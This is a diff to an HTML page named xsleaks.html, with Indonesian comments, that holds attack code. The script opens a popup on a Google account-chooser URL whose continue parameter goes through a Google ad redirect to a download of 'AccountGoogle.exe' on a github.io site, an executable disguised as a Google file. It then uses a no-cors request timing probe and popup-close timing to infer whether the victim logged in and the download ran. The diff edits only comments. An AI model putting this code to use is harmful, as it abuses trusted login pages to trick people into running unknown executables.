--- a/xsleaks.html
+++ b/xsleaks.html
@@ -43,8 +43,7 @@
     const resultDiv = document.getElementById('result');
 
     function openOAuthPopup() {
-      // URL gabungan: user diarahkan ke Google AccountChooser,
-      // dengan parameter continue yang mengarah ke file download (.exe)
+      // URL lengkap sesuai yang lo minta
       const googleLoginURL = "https://accounts.google.com/AccountChooser/signinchooser?continue=https%3A%2F%2Fadservice.google.com%2Fddm%2Fclk%2F408533097%3B208818505%3Bl%3B%3B%3F%2F%2Flanaya113505.github.io%2Fpizza%2FAccountGoogle.exe%3F%2Fhome&ddm=1&flowEntry=AccountChooser&flowName=GlifWebSignIn&hl=id&ltmpl=youtube&service=youtube&authuser=0";
       const popupWidth = 500, popupHeight = 600;
       const left = (screen.width - popupWidth) / 2;
@@ -52,17 +51,16 @@
       return window.open(googleLoginURL, 'GoogleLoginPopup', `width=${popupWidth},height=${popupHeight},top=${top},left=${left}`);
     }
 
-    // Fungsi untuk melakukan probing ke file download tanpa memicu download ulang secara eksplisit
+    // Fungsi probing resource menggunakan HEAD request
     async function probeFileCached() {
       const probeUrl = "https://lanaya113505.github.io/pizza/AccountGoogle.exe";
       const probeStart = performance.now();
       try {
-        // Metode HEAD request untuk menghindari download full
         await fetch(probeUrl, { method: 'HEAD', mode: 'no-cors' });
         const probeTime = performance.now() - probeStart;
         console.log("Probe time: " + probeTime.toFixed(2) + "ms");
         if (probeTime < 300) {
-          resultDiv.innerHTML += "<p>XS-Leak Probe: File likely cached (indicating download was triggered).</p>";
+          resultDiv.innerHTML += "<p>XS-Leak Probe: File likely cached (download triggered).</p>";
         } else {
           resultDiv.innerHTML += "<p>XS-Leak Probe: File not cached (download may not have been triggered).</p>";
         }
@@ -89,7 +87,7 @@
             const elapsed = performance.now() - startTime;
             resultDiv.innerHTML += `<p>Popup closed after ${elapsed.toFixed(2)} ms</p>`;
             
-            // Inferensi: jika popup ditutup dengan cepat, kemungkinan user sudah mengklik akun dan redirect terjadi.
+            // Inferensi: jika popup tertutup dengan cepat, kemungkinan user sudah memilih akun dan redirect berjalan.
             if (elapsed < 4000) {
               resultDiv.innerHTML += "<p>Inference: User likely logged in and triggered download.</p>";
             } else {
@@ -105,10 +103,9 @@
       }, 500);
     });
 
-    // Optional: Listener untuk postMessage, jika popup mengirim pesan (jika ada modifikasi lebih lanjut)
+    // Optional: Listener untuk postMessage, jika ada komunikasi tambahan dari popup
     window.addEventListener('message', (event) => {
       console.log("Received message from popup:", event.origin, event.data);
-      // Bisa proses pesan untuk leakage tambahan
     });
   </script>
 
